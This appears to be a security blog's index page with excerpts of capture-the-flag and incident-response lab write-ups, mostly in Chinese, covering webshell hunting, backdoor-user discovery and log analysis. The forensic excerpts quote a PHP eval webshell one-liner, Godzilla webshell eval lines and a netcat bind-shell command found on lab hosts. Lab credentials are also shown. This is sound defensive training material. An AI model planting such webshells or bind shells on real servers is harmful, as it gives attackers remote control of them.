Hi, I'm GAiLO
Security Researcher & Developer — Looking for light.
-
HTB——Blurry
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
玄机——第一章——webshell查杀
上线后我们快速搜索所有可能的后门文件后缀并匹配文件内容如eval,exec等。 find / type f -name '*.php' | xargs grep "eval(" ./var/www/html/include/gz.php: eval($payload); ./var/www/html/include/Db/.Mysqli.php: eval($payload); ./var/www/html/shell.php:<?php phpinfo();@eval($_REQUEST[1]);?> 我们依次翻看此三个文件。在gz.php中找出了第一个flag.通过鉴别文件名及开头三个标识@session_start();@set_time_limit(0);@error_reporting(0);可以得知此为哥斯拉的马,我们将哥斯拉的github地址薅下来md5一下。审计apache2访问日志,可以php://input的代码是走POST的记录不到。我们只能一个个文件夹查找ls -al看有无隐藏文件。发现gz.php的目录下还有一个Db文件夹,内部有一个隐藏的.Musqli.php文件。完整路径为/var/www/html/include/Db/.Mysqli.php.查杀apache2日志并grep一下.php?以查找所有给php文件传参的记录。查到一个top.php与index.php在进行传参行为。 wap文件夹下查看此两文件内容,index为正常业务文件,而top文件为免杀马。
-
玄机——Linux后门应急
登陆上去让我们查看一下后门用户,查看passwd文件直接发现一个backdoor用户,666盐都不盐了 然后我们需要ps -ef查看主机的所有运行的进程信息。查看到nc -lvp 9999 -c flag{infoFl4g}。然后我们需要审计9999端口是通过哪个配置文件启动的。我们需要先查看9999端口的进程。使用ps -aux指令查看启动该进程的启动命令。 user@ip-10-0-10-1:/var/log$ ps -aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 491 1 0 08:27 ? 00:00:00 bash root 497 0.0 0.0 2368 1720 ? S 08:27 0:00...
-
玄机——IIS日志分析
首先需要我们提供phpstudy-2018的站点日志绝对路径。在inetpub内,具体路径视题目内容而定。本题为C:\inetpub\logs\LogFiles\W3SVC2 我们先将日志导出,然后关键词检索 200 注意两边都要有空格,不然会匹配字符串中的200,搜索出有2315条请求回显为200的记录。再搜索HTTP的请求方法,经统计有GET、POST、DELETE、PUT、OPTIONS、HEAD、TRACE七种 使用python脚本处理,将访问php文件的记录全部提取出来。观察phpstudy_pro搭建的服务可知是emlog。查找emlog文件上传漏洞,得知其路径为/emlog/admin/plugin.php。 故上传路径为/emlog/admin/plugin.php # 读取日志文件并筛选出所有POST请求的记录 log_file_path = 'u_ex250220.log' output_file_path = 'filtered_post_requests.log' # 打开日志文件读取,创建一个新的文件来保存POST请求记录 with open(log_file_path, 'r', encoding='utf-8') as log_file, open(output_file_path, 'w', encoding='utf-8') as output_file: for line in log_file: # 检查请求方法是否为POST,假设日志格式中包含"POST"字样 if 'POST' in line: output_file.write(line) print(f"所有POST请求的记录已经筛选并保存到:{output_file_path}") 审计漏洞描述得知上传的马一般都会在plugins目录下,我们写个python脚本将此特征记录筛选出来。但貌似并没有什么明显的GET方式RCE。换个思路,我们审计一下emlog中对应位置的上传文件,看看有无恶意文件。在plugin文件夹下翻到一个木马。...
-
HTB——Sightless
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
玄机——windows应急-应急与研判训练计划一
首先分析靶机端口开放情况,发现开放了FTP,RDP和一个常规的8080服务。80端口给的静态不太可能被攻击,故提交三个端口。 分析全程流量。既然是上传的恶意文件,我们就得考虑POST方式筛选。筛选后我们手动审计流量过程。没有审计出有效信息,我们再转而审计nginx的日志。使用awk来格式化输出并统计IP出现次数 awk "{print $1}" access.log | sort | uniq -c 除本地地址外有一个地址大量访问,推测此IP即为恶意IP。保留此结果,我们继续审计。筛除访问404的结果,使用awk指令 awk "$9!=404 {print $1,$6,$7,$9}" access.log 输出发现末尾有一个可疑文件在传入指令。 恶意文件名暂定为newfile1.php。使用wireshark对IP源进行筛选,限定为上文中的恶意地址,查看IP访问情况。使用wireshark筛选ip.dst为恶意地址,统计->Endpoint选定后查看TCP包统计,发现3389端口的访问信息最多,怀疑3389端口为被攻击成功的端口。最后查看接管IP,我们先审计一下完整的system日志,在其中发现了攻击记录。先是发现了很多kali端的133ip登陆记录,在此之外还有一个192.168.18.1的外部IP,合理怀疑其就是最终接管IP
-
HTB——Instant
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
HTB——Cap
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
HTB——Certified
0x01信息收集 Machine Information:As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _...
-
HTB——Strutted
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
HTB——Hospital
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
HTB——Chemistry
0x01 信息收集 此处fscan扫不出来特定端口的,我们就只贴Tscan的结果了。 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / /...